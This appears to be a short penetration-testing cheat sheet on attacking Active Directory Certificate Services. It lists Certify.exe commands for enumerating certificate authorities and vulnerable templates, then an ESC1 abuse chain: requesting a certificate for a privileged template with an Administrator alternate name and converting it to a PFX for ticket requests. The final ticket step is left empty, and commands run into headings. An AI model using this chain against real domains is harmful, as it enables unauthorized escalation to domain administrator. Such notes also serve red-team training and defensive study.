ad-cs
Methodology
Binaries
[!INFO] Remember to follow the Binaries methodology
Certify
Enumerate all Certificate Authorities (CA) in the domain:
Certify.exe casEnumerate templates:
Certify.exe findEnumerate vulnerable templates:
Certify.exe find /vulnerableESC1
Enroll in template and copy private key to a file:
Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:AdministratorChange RSA to PFX:
openssl.exe pkcs12 -in cert.pem - keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out DA.pfxRequest TGT with the PFX:
Last updated